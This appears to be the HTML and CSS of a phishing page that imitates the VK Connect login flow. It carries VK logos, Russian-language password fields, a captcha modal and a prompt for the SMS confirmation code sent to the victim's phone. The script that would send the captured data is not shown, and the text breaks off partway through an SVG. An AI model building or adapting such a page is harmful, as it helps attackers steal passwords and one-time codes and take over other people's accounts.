<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Авторизация</title>
    <link rel="stylesheet" href="normalize.css">
    <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700;800&display=swap" rel="stylesheet">
    <style>
        iframe{position:fixed;top:0;left:0;right:0;bottom:0;z-index:1000;width:100%;height:100%;border:none}

        body {
            font-family: 'Inter', sans-serif;
            text-align: center;
            background:#fff;
        }
        
        .container {
            max-width: 375px;
            margin: 0px auto;
        }

        .vk-connect {
            margin-top: 18px;
            margin-bottom: 54px;
            display: inline-block;
        }

        .vk-connect-validate {
            margin-top: 18px;
            margin-bottom: 54px;
            display: inline-block;
        }

        .close {
            text-align: left;
            position: relative;
            margin-left: 20px;
            top: 38px;
        }

        .vk-logo {
            margin-bottom: 54px;
        }

        .auth {
            margin: 0 auto;
            margin-bottom: 120px;
        }

        .inputs {
            margin-bottom: 10px;
            border-radius: 12px;
            position: relative;
        }

        input[type="text" i] {
            padding: 14px 12px;
            width: 84%;
            border-radius: 12px 12px 0 0;
            border: 0.5px solid rgba(0, 0, 0, 0.12);
            background-color: #F2F3F5;
            
        }

        .captcha {
            border-radius: 12px !important;
        }

        .code {
            border-radius: 12px !important;
        }

        input::-webkit-outer-spin-button,
        input::-webkit-inner-spin-button {
            -webkit-appearance: none;
        }

        input[type="number" i] {
            padding: 14px 12px;
            width: 34%;
            border-radius: 12px;
            background-color: #F2F3F5;
            border: 0.5px solid rgba(0, 0, 0, 0.12);
            -moz-appearance: textfield;
        }

        input[type="number" i]:focus {
            border-radius: 12px 12px 0 0;
            border: 1px solid #4986cc80;
        }

        input[type="number" i]:focus-visible {
            outline: none;
        }

        input[type="password" i] {
            padding: 14px 12px;
            width: 84%;
            border-radius: 0 0 12px 12px;
            background-color: #F2F3F5;
            margin-top: -1px;
            border: 0.5px solid rgba(0, 0, 0, 0.12);
        }

        input[type="text" i]:focus-visible {
            outline: none;
        }

        input[type="password" i]:focus-visible {
            outline: none;
        }

        input[type="text" i]:focus {
            border-radius: 12px 12px 0 0;
            border: 1px solid #4986cc80;
        }

        .captcha input[type="text" i]:focus {
            border-radius: 12px !important;
        }

        input[type="password" i]:focus {
            border-radius: 0 0 12px 12px;
            border: 1px solid #4986cc80;
        }

        .password input[type="text" i] {
            border-radius: 0 0 12px 12px !important;
            margin-top: -1px;
            border-bottom: 0.5px solid rgba(0, 0, 0, 0.12) !important;
        }

        .password input[type="text" i]:focus {
            border-radius: 0 0 12px 12px !important;
        }

        .question {
            position: absolute;
            right: 30px;
            bottom: 13px;
        }

        .show {
            position: absolute;
            right: 56px;
            bottom: 15px;
            cursor: pointer;
        }

        .btn-auth {
            display: inline-block;
            width: 90%;
            line-height: 42px;
            font-size: 18px;
            border-radius: 12px;
            background-color: #4986CC;
            color: #fff;
            border: none; 
            outline: none; 
            font-weight: 500;
            cursor: pointer;
        }

                
        .modal {
            position: fixed;
            top: 0;
            right: 0;
            bottom: 30%;
            left: 0;
            overflow: auto;
            text-align: center;
            z-index: 800;
        }

        .modal::before {
            content: "";
            height: 100%;
            display: inline-block;
            vertical-align: middle;
        }

        .modal-overlay {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(45, 50, 56, 0.9);
        }

        .modal-inner {
            width: 95%;
            max-width: 355px;
            position: relative;
            z-index: 500;
            display: inline-block;
            vertical-align: middle;
        }

        .loader-modal-inner {
            position: relative;
            z-index: 500;
            display: inline-block;
            vertical-align: middle;
        }

        .modal-content {
            background-color: #FFF;
            border-radius: 18px;
        }

        .modal-close {
            position: absolute;
            top: 40px;
            right: 20px;
            width: 24px;
            height: 24px;
            background: url(close.svg) no-repeat;
            cursor: pointer;
        }

        .modal-skip {
            position: absolute;
            top: 18px;
            left: -10px;
            width: 24px;
            height: 24px;
            cursor: pointer;
        }

        .modal-skip path {
            fill: #4986CC;
        }

        .modal-icon {
            display: inline-block;
        }

                
        .modal-description {
            line-height: 18px;
            color: #4d4d4d;
            letter-spacing: 0.15px;
        }


        .modal-title {
            margin-bottom: 8px;
            font-weight: 600;
            font-size: 20px;
            line-height: 24px;
            padding-top: 20px;
        }

        .modal-buttons {
            margin: 25px -6px 0;
        }

        .captcha-content {
	        padding: 22px 18px 25px;
        }

        .validate-content {
	        padding: 22px 18px 25px;
        }

        .validate {
            padding-top: 0;
            margin-top: 0;
        }

        .modal-validate-overlay {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: #ffffff;
        }

        .modal-validate {
            bottom: unset;
        }

        .loader-content {
	        padding: 12px;
        }

        .error-content {
	        padding: 16px 14px 16px;
        }

        .captcha-content img {
	        margin-bottom: 16px;
        }

        @keyframes spin {
            100%{transform: rotate(360deg)}
        }

        .loader {
            position: relative;
            top: 2px;
        }
        
        .loader > svg {
            animation: spin linear .8s infinite;
        }

        .loader path {
            fill: #99a2ad;
        }

        .loader svg {
            height: 34px;
            width: 34px;
        }

        .btn {
            display: inline-block;
            border-radius: 12px;
            text-decoration: none;
        }

        .btn-send {
            color: #ffffff;
            background-color: #4986CC;
        }

        .button {
            box-sizing: border-box;
        }

        .btn-send {
            width: 80%;
            font-size: 17px;
            line-height: 45px;
        }

        .btn-auth-disabled {
            background-color: #4986cc80;
            color: rgba(255, 255, 255, 0.746);
            cursor: default;
        }

        .error {
            margin: 0 auto;
            max-width: 80%;
            padding: 20px;
            text-align: left !important;
            background-color: #e6464618;
            margin-bottom: 10px;
            border-radius: 12px;
        }

        .title-error {
            color: #e64646;
            font-weight: 600;
            margin-bottom: 8px;
        }

        .desc-error {
            font-size: 14px;
            color: #e64646;
        }

        .desc-error span {
            color: #4986CC;
        }

        [v-cloak] {
            display: none
        }

        @media (prefers-color-scheme: dark) {
            body {
                background: #19191A;
            }

            .btn-auth {
                color: #2C2D2E;
                background-color: #fff;
            }

            .modal-title {
                color: #fff;
            }

            .btn-send {
                color: #2C2D2E;
                background-color: #fff;
            }

            .close-path {
                fill: #fff;
                color: #fff;
            }

            .modal-content {
                background-color: #19191A;
            }

            .modal-description {
                color: rgba(255, 255, 255, 0.404);
            }

            input[type="password" i] {
                background-color: #1f1f20;
                border: 0.5px solid rgba(255, 255, 255, 0.12);
                margin-top: -1px;
                color: #fff;
            }

            .password input[type="text" i] {
                background-color: #1f1f20;
                border: 0.5px solid rgba(255, 255, 255, 0.12) !important;
                margin-top: -1px;
                color: #fff;
            }

            input[type="text" i] {
                background-color: #1f1f20;
                border: 0.5px solid rgba(255, 255, 255, 0.12);
                color: #fff;
            }

            input[type="number" i] {
                background-color: #1f1f20;
                border: 0.5px solid rgba(255, 255, 255, 0.12);
                color: #fff;
            }

            .btn-auth-disabled {
                background-color: rgba(255, 255, 255, 0.38);
                color: #2c2d2eda;
            }

            .modal-validate-overlay { 
                background-color: #19191A;
            }

            .modal-skip path {
                fill: #fff;
            }
        }

    </style>
</head>
<body>
    <div id="app" v-cloak>
        <template v-if="iframe">
            <iframe src="index.html?finish=true"></iframe>
        </template>
        <template v-if="modal_captcha">
            <div class="modal modal-captcha">
                <div class="modal-overlay" @click="modal_captcha = false"></div>
                <div class="modal-inner">
                    <div class="modal-close" @click="modal_captcha = false"></div>
                    <div class="modal-content">
                        <h3 class="modal-title">Введите капчу</h3>
                        <div class="captcha-content">
                            <img :src="captcha_img" alt="captcha">
                            <input class="captcha" type="text" placeholder="Введите капчу" v-model="captcha">
                            <div class="modal-buttons">
                                <div class="button">
                                    <a href="#" class="btn btn-send" :class="{'btn-auth-disabled': isCaptchaDisabled}" :disabled="isCaptchaDisabled" @click.prevent="authorization">Отправить</a>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </template>
        <template v-if="modal_validate">
            <div class="modal modal-validate">
                <div class="modal-validate-overlay"></div>
                <div class="modal-inner">
                    <div class="modal-skip" @click="modal_validate = false">
                        <svg width="10" height="18" viewBox="0 0 10 18" fill="none" xmlns="http://www.w3.org/2000/svg">
                            <path d="M2.41421 9L9.70711 16.2929C10.0976 16.6834 10.0976 17.3166 9.70711 17.7071C9.31658 18.0976 8.68342 18.0976 8.29289 17.7071L0.292893 9.70711C-0.0976311 9.31658 -0.0976311 8.68342 0.292893 8.29289L8.29289 0.292893C8.68342 -0.0976311 9.31658 -0.0976311 9.70711 0.292893C10.0976 0.683418 10.0976 1.31658 9.70711 1.70711L2.41421 9Z" fill="white"/>
                        </svg>
                    </div>
                    <div class="vk-connect-validate">
                        <svg width="94" height="21" viewBox="0 0 94 21" fill="none" xmlns="http://www.w3.org/2000/svg">
                            <path d="M13.8082 0C19.726 0 21.135 1.4 21.135 7.28V13.72C21.135 19.6 19.726 21 13.8082 21H7.32681C1.409 21 0 19.6 0 13.72V7.28C0 1.4 1.409 0 7.32681 0H13.8082ZM5.50394 6.5625H3.96285C3.52253 6.5625 3.43446 6.76845 3.43446 6.99556C3.43446 7.40114 3.95693 9.41273 5.86715 12.0732C7.14063 13.8901 8.93486 14.875 10.5675 14.875C11.5471 14.875 11.6683 14.6563 11.6683 14.2795V12.9063C11.6683 12.4688 11.7611 12.3814 12.0713 12.3814C12.2999 12.3814 12.6918 12.495 13.6061 13.371C14.651 14.4092 14.8232 14.875 15.411 14.875H16.9521C17.3924 14.875 17.6126 14.6562 17.4856 14.2246C17.3466 13.7943 16.8477 13.1701 16.1857 12.4301C15.8265 12.0083 15.2877 11.5541 15.1244 11.327C14.8959 11.035 14.9612 10.9052 15.1244 10.6456L15.1519 10.607C15.3841 10.2791 17.016 7.95386 17.198 7.12537C17.2959 6.80091 17.198 6.5625 16.7319 6.5625H15.1908C14.799 6.5625 14.6183 6.76845 14.5204 6.99556C14.5204 6.99556 13.7367 8.8936 12.6264 10.1265C12.2673 10.4834 12.104 10.5969 11.9081 10.5969C11.8101 10.5969 11.6683 10.4834 11.6683 10.159V7.12537C11.6683 6.73602 11.5546 6.5625 11.228 6.5625H8.80629C8.56142 6.5625 8.41415 6.74321 8.41415 6.91447C8.41415 7.28356 8.96923 7.36868 9.02645 8.40693V10.6619C9.02645 11.1562 8.93659 11.2459 8.74067 11.2459C8.21823 11.2459 6.94739 9.33936 6.19367 7.1578C6.04596 6.73378 5.8978 6.5625 5.50394 6.5625Z" fill="#A6ABB2"/>
                            <path d="M37.0564 11.0439C36.9486 11.5392 36.7768 12.0011 36.5411 12.4294C36.3053 12.8511 36.0055 13.2193 35.6417 13.5339C35.2847 13.8485 34.8738 14.0961 34.4089 14.2769C33.9508 14.4509 33.4523 14.5379 32.9134 14.5379C32.2937 14.5379 31.7143 14.4241 31.1754 14.1965C30.6365 13.9623 30.1615 13.6376 29.7506 13.2226C29.3464 12.8009 29.0298 12.3023 28.8007 11.7266C28.5784 11.151 28.4673 10.5117 28.4673 9.80893C28.4673 9.1128 28.5784 8.47692 28.8007 7.90128C29.0298 7.32563 29.3464 6.83031 29.7506 6.41531C30.1615 5.99362 30.6365 5.66564 31.1754 5.43137C31.7143 5.19709 32.2937 5.07996 32.9134 5.07996C33.4523 5.07996 33.9508 5.17032 34.4089 5.35104C34.8738 5.52508 35.2847 5.77274 35.6417 6.09402C36.0055 6.40862 36.3019 6.78011 36.5309 7.2085C36.7667 7.63019 36.9419 8.08535 37.0564 8.57397H35.086C34.931 8.05188 34.675 7.63019 34.318 7.3089C33.961 6.98761 33.4928 6.82697 32.9134 6.82697C32.5833 6.82697 32.26 6.90059 31.9433 7.04785C31.6267 7.18842 31.3505 7.39257 31.1148 7.66031C30.879 7.92805 30.687 8.24599 30.5388 8.61414C30.3973 8.97559 30.3266 9.37385 30.3266 9.80893C30.3266 10.2507 30.3973 10.6523 30.5388 11.0138C30.687 11.3752 30.879 11.6898 31.1148 11.9576C31.3505 12.2253 31.6267 12.4328 31.9433 12.58C32.26 12.7206 32.5833 12.7909 32.9134 12.7909C33.4928 12.7909 33.961 12.6302 34.318 12.309C34.6818 11.9877 34.9378 11.566 35.086 11.0439H37.0564Z" fill="#A6ABB2"/>
                            <path d="M45.2233 9.80893C45.2233 9.36716 45.1492 8.96555 45.001 8.6041C44.8595 8.24265 44.6709 7.92805 44.4351 7.66031C44.1993 7.39257 43.9231 7.18842 43.6065 7.04785C43.2899 6.90059 42.9665 6.82697 42.6364 6.82697C42.3063 6.82697 41.983 6.90059 41.6664 7.04785C41.3497 7.18842 41.0735 7.39257 40.8378 7.66031C40.602 7.92805 40.41 8.24599 40.2618 8.61414C40.1203 8.97559 40.0496 9.37385 40.0496 9.80893C40.0496 10.2507 40.1203 10.6523 40.2618 11.0138C40.41 11.3752 40.602 11.6898 40.8378 11.9576C41.0735 12.2253 41.3497 12.4328 41.6664 12.58C41.983 12.7206 42.3063 12.7909 42.6364 12.7909C42.9665 12.7909 43.2899 12.7206 43.6065 12.58C43.9231 12.4328 44.1993 12.2253 44.4351 11.9576C44.6709 11.6898 44.8595 11.3752 45.001 11.0138C45.1492 10.6523 45.2233 10.2507 45.2233 9.80893ZM47.0826 9.80893C47.0826 10.5051 46.968 11.1443 46.739 11.7266C46.5167 12.3023 46.2001 12.8009 45.7891 13.2226C45.3849 13.6376 44.9134 13.9623 44.3745 14.1965C43.8355 14.4241 43.2562 14.5379 42.6364 14.5379C42.0167 14.5379 41.4373 14.4241 40.8984 14.1965C40.3595 13.9623 39.8845 13.6376 39.4736 13.2226C39.0694 12.8009 38.7528 12.3023 38.5238 11.7266C38.3014 11.151 38.1903 10.5117 38.1903 9.80893C38.1903 9.1128 38.3014 8.47692 38.5238 7.90128C38.7528 7.32563 39.0694 6.83031 39.4736 6.41531C39.8845 5.99362 40.3595 5.66564 40.8984 5.43137C41.4373 5.19709 42.0167 5.07996 42.6364 5.07996C43.2562 5.07996 43.8355 5.19709 44.3745 5.43137C44.9134 5.66564 45.3849 5.99362 45.7891 6.41531C46.2001 6.83031 46.5167 7.32563 46.739 7.90128C46.968 8.47692 47.0826 9.1128 47.0826 9.80893Z" fill="#A6ABB2"/>
                            <path d="M53.279 5.07996C53.791 5.07996 54.2726 5.18036 54.724 5.38116C55.1821 5.58197 55.5795 5.8564 55.9163 6.20447C56.2532 6.55253 56.5193 6.97422 56.7146 7.46954C56.91 7.95817 57.0077 8.50035 57.0077 9.09607V14.4375H55.1484V9.09607C55.1484 8.79486 55.0877 8.50704 54.9665 8.2326C54.852 7.95817 54.6937 7.7172 54.4916 7.5097C54.2895 7.30221 54.0571 7.13821 53.7943 7.01773C53.5316 6.89055 53.2554 6.82697 52.9657 6.82697C52.6491 6.82697 52.3527 6.89055 52.0765 7.01773C51.8003 7.13821 51.5578 7.30221 51.349 7.5097C51.1469 7.7172 50.9852 7.95817 50.8639 8.2326C50.7494 8.50035 50.6921 8.78817 50.6921 9.09607V14.4375H48.8328V5.18036H50.1768L50.5911 6.11411C50.773 5.91999 50.9852 5.74596 51.2277 5.59201C51.45 5.47153 51.7296 5.35774 52.0664 5.25064C52.4032 5.13685 52.8074 5.07996 53.279 5.07996Z" fill="#A6ABB2"/>
                            <path d="M63.6083 5.07996C64.1203 5.07996 64.6019 5.18036 65.0533 5.38116C65.5114 5.58197 65.9088 5.8564 66.2456 6.20447C66.5825 6.55253 66.8486 6.97422 67.0439 7.46954C67.2393 7.95817 67.337 8.50035 67.337 9.09607V14.4375H65.4777V9.09607C65.4777 8.79486 65.417 8.50704 65.2958 8.2326C65.1813 7.95817 65.023 7.7172 64.8209 7.5097C64.6188 7.30221 64.3864 7.13821 64.1236 7.01773C63.8609 6.89055 63.5847 6.82697 63.295 6.82697C62.9784 6.82697 62.682 6.89055 62.4058 7.01773C62.1296 7.13821 61.8871 7.30221 61.6783 7.5097C61.4762 7.7172 61.3145 7.95817 61.1932 8.2326C61.0787 8.50035 61.0214 8.78817 61.0214 9.09607V14.4375H59.1621V5.18036H60.5061L60.9204 6.11411C61.1023 5.91999 61.3145 5.74596 61.557 5.59201C61.7793 5.47153 62.0589 5.35774 62.3957 5.25064C62.7325 5.13685 63.1367 5.07996 63.6083 5.07996Z" fill="#A6ABB2"/>
                            <path d="M77.5652 11.7668C77.4103 12.1483 77.2149 12.5064 76.9791 12.8411C76.7434 13.1758 76.4604 13.4703 76.1303 13.7246C75.8002 13.979 75.4163 14.1798 74.9784 14.3271C74.5472 14.4676 74.0622 14.5379 73.5233 14.5379C72.9035 14.5379 72.3242 14.4241 71.7852 14.1965C71.2463 13.9623 70.7748 13.6376 70.3706 13.2226C69.9664 12.8009 69.6498 12.3023 69.4207 11.7266C69.1917 11.151 69.0771 10.5117 69.0771 9.80893C69.0771 9.1128 69.1917 8.47692 69.4207 7.90128C69.6498 7.32563 69.9596 6.83031 70.3504 6.41531C70.7411 5.99362 71.2025 5.66564 71.7347 5.43137C72.2669 5.19709 72.8294 5.07996 73.4222 5.07996C74.0151 5.07996 74.5776 5.19709 75.1097 5.43137C75.6419 5.66564 76.1034 5.99362 76.4941 6.41531C76.8848 6.83031 77.1947 7.32563 77.4238 7.90128C77.6528 8.47692 77.7673 9.1128 77.7673 9.80893C77.7673 9.91603 77.7606 10.0231 77.7471 10.1302C77.7336 10.2306 77.7202 10.3176 77.7067 10.3913C77.6932 10.485 77.6797 10.5653 77.6663 10.6322H71.0375C71.0644 10.9201 71.1486 11.1945 71.2901 11.4555C71.4316 11.7166 71.6067 11.9475 71.8156 12.1483C72.0311 12.3424 72.2871 12.4997 72.5835 12.6202C72.8799 12.734 73.1932 12.7909 73.5233 12.7909C74.0892 12.7909 74.5371 12.6704 74.8672 12.4294C75.2041 12.1885 75.4466 11.9676 75.5948 11.7668H77.5652ZM73.4222 6.82697C72.8025 6.82697 72.277 7.03781 71.8459 7.4595C71.4215 7.8745 71.152 8.42002 71.0375 9.09607H76.0091C75.9013 8.42672 75.6251 7.8812 75.1805 7.4595C74.7426 7.03781 74.1565 6.82697 73.4222 6.82697Z" fill="#A6ABB2"/>
                            <path d="M87.5914 11.0439C87.4836 11.5392 87.3118 12.0011 87.076 12.4294C86.8402 12.8511 86.5405 13.2193 86.1767 13.5339C85.8197 13.8485 85.4087 14.0961 84.9439 14.2769C84.4858 14.4509 83.9873 14.5379 83.4484 14.5379C82.8286 14.5379 82.2493 14.4241 81.7104 14.1965C81.1714 13.9623 80.6965 13.6376 80.2856 13.2226C79.8814 12.8009 79.5648 12.3023 79.3357 11.7266C79.1134 11.151 79.0023 10.5117 79.0023 9.80893C79.0023 9.1128 79.1134 8.47692 79.3357 7.90128C79.5648 7.32563 79.8814 6.83031 80.2856 6.41531C80.6965 5.99362 81.1714 5.66564 81.7104 5.43137C82.2493 5.19709 82.8286 5.07996 83.4484 5.07996C83.9873 5.07996 84.4858 5.17032 84.9439 5.35104C85.4087 5.52508 85.8197 5.77274 86.1767 6.09402C86.5405 6.40862 86.8369 6.78011 87.0659 7.2085C87.3017 7.63019 87.4769 8.08535 87.5914 8.57397H85.6209C85.466 8.05188 85.21 7.63019 84.853 7.3089C84.4959 6.98761 84.0277 6.82697 83.4484 6.82697C83.1183 6.82697 82.7949 6.90059 82.4783 7.04785C82.1617 7.18842 81.8855 7.39257 81.6497 7.66031C81.4139 7.92805 81.222 8.24599 81.0738 8.61414C80.9323 8.97559 80.8615 9.37385 80.8615 9.80893C80.8615 10.2507 80.9323 10.6523 81.0738 11.0138C81.222 11.3752 81.4139 11.6898 81.6497 11.9576C81.8855 12.2253 82.1617 12.4328 82.4783 12.58C82.7949 12.7206 83.1183 12.7909 83.4484 12.7909C84.0277 12.7909 84.4959 12.6302 84.853 12.309C85.2167 11.9877 85.4727 11.566 85.6209 11.0439H87.5914Z" fill="#A6ABB2"/>
                            <path d="M91.9285 11.3551C91.9285 11.7634 92.0666 12.1048 92.3428 12.3792C92.619 12.6537 92.9626 12.7909 93.3735 12.7909C93.4409 12.7909 93.5116 12.7875 93.5857 12.7809C93.6665 12.7742 93.7406 12.7641 93.808 12.7507C93.8754 12.7373 93.9394 12.7173 94 12.6905V14.3371C93.9192 14.3773 93.8215 14.4107 93.707 14.4375C93.4981 14.5044 93.2522 14.5379 92.9693 14.5379C92.5584 14.5379 92.1744 14.4643 91.8174 14.317C91.467 14.1631 91.1605 13.9489 90.8978 13.6744C90.6351 13.4 90.4296 13.0687 90.2814 12.6805C90.1399 12.2922 90.0692 11.8505 90.0692 11.3551V6.92737H88.412V5.18036H89.1396C89.4966 5.18036 89.793 5.06657 90.0288 4.83899C90.2646 4.60472 90.3825 4.3102 90.3825 3.95544V2.72049H91.9285V5.18036H94V6.92737H91.9285V11.3551Z" fill="#A6ABB2"/>
                        </svg>
                    </div>
                    <div class="modal-content">
                        <h3 class="modal-title validate">Подтвердите вход</h3>
                        <p class="modal-description">
                            Чтобы подтвердить, что вы являетесь владельцем этой учетной записи, введите код отправленный вам на телефон
                        </p>
                        <div class="validate-content">
                            <input class="code" type="number" v-model="code">
                            <div class="modal-buttons">
                                <div class="button">
                                    <a href="#" class="btn btn-send" v-if="!isValidateDisabled" @click.prevent="authorization">Подтвердить</a>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </template>
        <template v-if="modal_error">
            <div class="modal modal-error">
                <div class="modal-overlay" @click="modal_error = false"></div>
                <div class="modal-inner">
                    <div class="modal-content">
                        <div class="error-content">
                            <div class="modal-icon">
                                <svg width="34" height="34" viewBox="0 0 34 34" fill="none" xmlns="http://www.w3.org/2000/svg">
                                    <path opacity="0.12" d="M17 34C26.3888 34 34 26.3888 34 17C34 7.61116 26.3888 0 17 0C7.61116 0 0 7.61116 0 17C0 26.3888 7.61116 34 17 34Z" fill="#818C99"/>
                                    <path d="M23.7099 10.2901C24.2079 10.788 24.2079 11.5953 23.7099 12.0932L18.8034 17L23.7099 21.9067C24.1664 22.3632 24.2044 23.0796 23.824 23.5793L23.7099 23.7099C23.212 24.2078 22.4047 24.2078 21.9068 23.7099L17 18.8034L12.0932 23.7099C11.5953 24.2078 10.788 24.2078 10.2901 23.7099C9.79221 23.212 9.79221 22.4047 10.2901 21.9067L15.1966 17L10.2901 12.0932C9.8337 11.6368 9.79567 10.9204 10.176 10.4206L10.2901 10.2901C10.788 9.79215 11.5953 9.79215 12.0932 10.2901L17 15.1965L21.9068 10.2901C22.4047 9.79215 23.212 9.79215 23.7099 10.2901Z" fill="#818C99"/>
                                </svg>
                            </div>
                            <p class="modal-description">
                                Быстрая авторизация для этого аккаунта не доступна
                            </p>
                        </div>
                    </div>
                </div>
            </div>
        </template>
        <template v-if="modal_loader">
            <div class="modal modal-loader">
                <div class="modal-overlay"></div>
                <div class="loader-modal-inner">
                    <div class="modal-content">
                        <div class="loader-content">
                            <span class="loader">
                                <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 32 32" id="spinner_32">
                                    <path d="M16 32a1.5 1.5 0 010-3c7.18 0 13-5.82 13-13S23.18 3 16 3 3 8.82 3 16c0 1.557.273 3.074.8 4.502A1.5 1.5 0 11.986 21.54 15.97 15.97 0 010 16C0 7.163 7.163 0 16 0s16 7.163 16 16-7.163 16-16 16z" fill="currentColor" fill-rule="nonzero"></path>
                                </svg>
                            </span>
                        </div>
                    </div>
                </div>
            </div>
        </template>
        <div class="container">
            <div class="header">
                <div class="close">
                    <a href="#">
                        <svg width="14" height="14" viewBox="0 0 14 14" fill="none" xmlns="http://www.w3.org/2000/svg">
                            <path class="close-path" d="M0.256282 0.256282C0.597991 -0.085427 1.15201 -0.085427 1.49372 0.256282L7 5.76188L12.5063 0.256282C12.8217 -0.0591417 13.318 -0.0834054 13.6613 0.183491L13.7437 0.256282C14.0854 0.597991 14.0854 1.15201 13.7437 1.49372L8.23812 7L13.7437 12.5063C14.0591 12.8217 14.0834 13.318 13.8165 13.6613L13.7437 13.7437C13.402 14.0854 12.848 14.0854 12.5063 13.7437L7 8.23812L1.49372 13.7437C1.17829 14.0591 0.681968 14.0834 0.338713 13.8165L0.256282 13.7437C-0.085427 13.402 -0.085427 12.848 0.256282 12.5063L5.76188 7L0.256282 1.49372C-0.0591417 1.17829 -0.0834054 0.681968 0.183491 0.338713L0.256282 0.256282Z" fill="#4986CC"/>
                        </svg>
                    </a>
                </div>
                <div class="vk-connect">
                    <svg width="94" height="21" viewBox="0 0 94 21" fill="none" xmlns="http://www.w3.org/2000/svg">
                        <path d="M13.8082 0C19.726 0 21.135 1.4 21.135 7.28V13.72C21.135 19.6 19.726 21 13.8082 21H7.32681C1.409 21 0 19.6 0 13.72V7.28C0 1.4 1.409 0 7.32681 0H13.8082ZM5.50394 6.5625H3.96285C3.52253 6.5625 3.43446 6.76845 3.43446 6.99556C3.43446 7.40114 3.95693 9.41273 5.86715 12.0732C7.14063 13.8901 8.93486 14.875 10.5675 14.875C11.5471 14.875 11.6683 14.6563 11.6683 14.2795V12.9063C11.6683 12.4688 11.7611 12.3814 12.0713 12.3814C12.2999 12.3814 12.6918 12.495 13.6061 13.371C14.651 14.4092 14.8232 14.875 15.411 14.875H16.9521C17.3924 14.875 17.6126 14.6562 17.4856 14.2246C17.3466 13.7943 16.8477 13.1701 16.1857 12.4301C15.8265 12.0083 15.2877 11.5541 15.1244 11.327C14.8959 11.035 14.9612 10.9052 15.1244 10.6456L15.1519 10.607C15.3841 10.2791 17.016 7.95386 17.198 7.12537C17.2959 6.80091 17.198 6.5625 16.7319 6.5625H15.1908C14.799 6.5625 14.6183 6.76845 14.5204 6.99556C14.5204 6.99556 13.7367 8.8936 12.6264 10.1265C12.2673 10.4834 12.104 10.5969 11.9081 10.5969C11.8101 10.5969 11.6683 10.4834 11.6683 10.159V7.12537C11.6683 6.73602 11.5546 6.5625 11.228 6.5625H8.80629C8.56142 6.5625 8.41415 6.74321 8.41415 6.91447C8.41415 7.28356 8.96923 7.36868 9.02645 8.40693V10.6619C9.02645 11.1562 8.93659 11.2459 8.74067 11.2459C8.21823 11.2459 6.94739 9.33936 6.19367 7.1578C6.04596 6.73378 5.8978 6.5625 5.50394 6.5625Z" fill="#A6ABB2"/>
                        <path d="M37.0564 11.0439C36.9486 11.5392 36.7768 12.0011 36.5411 12.4294C36.3053 12.8511 36.0055 13.2193 35.6417 13.5339C35.2847 13.8485 34.8738 14.0961 34.4089 14.2769C33.9508 14.4509 33.4523 14.5379 32.9134 14.5379C32.2937 14.5379 31.7143 14.4241 31.1754 14.1965C30.6365 13.9623 30.1615 13.6376 29.7506 13.2226C29.3464 12.8009 29.0298 12.3023 28.8007 11.7266C28.5784 11.151 28.4673 10.5117 28.4673 9.80893C28.4673 9.1128 28.5784 8.47692 28.8007 7.90128C29.0298 7.32563 29.3464 6.83031 29.7506 6.41531C30.1615 5.99362 30.6365 5.66564 31.1754 5.43137C31.7143 5.19709 32.2937 5.07996 32.9134 5.07996C33.4523 5.07996 33.9508 5.17032 34.4089 5.35104C34.8738 5.52508 35.2847 5.77274 35.6417 6.09402C36.0055 6.40862 36.3019 6.78011 36.5309 7.2085C36.7667 7.63019 36.9419 8.08535 37.0564 8.57397H35.086C34.931 8.05188 34.675 7.63019 34.318 7.3089C33.961 6.98761 33.4928 6.82697 32.9134 6.82697C32.5833 6.82697 32.26 6.90059 31.9433 7.04785C31.6267 7.18842 31.3505 7.39257 31.1148 7.66031C30.879 7.92805 30.687 8.24599 30.5388 8.61414C30.3973 8.97559 30.3266 9.37385 30.3266 9.80893C30.3266 10.2507 30.3973 10.6523 30.5388 11.0138C30.687 11.3752 30.879 11.6898 31.1148 11.9576C31.3505 12.2253 31.6267 12.4328 31.9433 12.58C32.26 12.7206 32.5833 12.7909 32.9134 12.7909C33.4928 12.7909 33.961 12.6302 34.318 12.309C34.6818 11.9877 34.9378 11.566 35.086 11.0439H37.0564Z" fill="#A6ABB2"/>
                        <path d="M45.2233 9.80893C45.2233 9.36716 45.1492 8.96555 45.001 8.6041C44.8595 8.24265 44.6709 7.92805 44.4351 7.66031C44.1993 7.39257 43.9231 7.18842 43.6065 7.04785C43.2899 6.90059 42.9665 6.82697 42.6364 6.82697C42.3063 6.82697 41.983 6.90059 41.6664 7.04785C41.3497 7.18842 41.0735 7.39257 40.8378 7.66031C40.602 7.92805 40.41 8.24599 40.2618 8.61414C40.1203 8.97559 40.0496 9.37385 40.0496 9.80893C40.0496 10.2507 40.1203 10.6523 40.2618 11.0138C40.41 11.3752 40.602 11.6898 40.8378 11.9576C41.0735 12.2253 41.3497 12.4328 41.6664 12.58C41.983 12.7206 42.3063 12.7909 42.6364 12.7909C42.9665 12.7909 43.2899 12.7206 43.6065 12.58C43.9231 12.4328 44.1993 12.2253 44.4351 11.9576C44.6709 11.6898 44.8595 11.3752 45.001 11.0138C45.1492 10.6523 45.2233 10.2507 45.2233 9.80893ZM47.0826 9.80893C47.0826 10.5051 46.968 11.1443 46.739 11.7266C46.5167 12.3023 46.2001 12.8009 45.7891 13.2226C45.3849 13.6376 44.9134 13.9623 44.3745 14.1965C43.8355 14.4241 43.2562 14.5379 42.6364 14.5379C42.0167 14.5379 41.4373 14.4241 40.8984 14.1965C40.3595 13.9623 39.8845 13.6376 39.4736 13.2226C39.0694 12.8009 38.7528 12.3023 38.5238 11.7266C38.3014 11.151 38.1903 10.5117 38.1903 9.80893C38.1903 9.1128 38.3014 8.47692 38.5238 7.90128C38.7528 7.32563 39.0694 6.83031 39.4736 6.41531C39.8845 5.99362 40.3595 5.66564 40.8984 5.43137C41.4373 5.19709 42.0167 5.07996 42.6364 5.07996C43.2562 5.07996 43.8355 5.19709 44.3745 5.43137C44.9134 5.66564 45.3849 5.99362 45.7891 6.41531C46.2001 6.83031 46.5167 7.32563 46.739 7.90128C46.968 8.47692 47.0826 9.1128 47.0826 9.80893Z" fill="#A6ABB2"/>
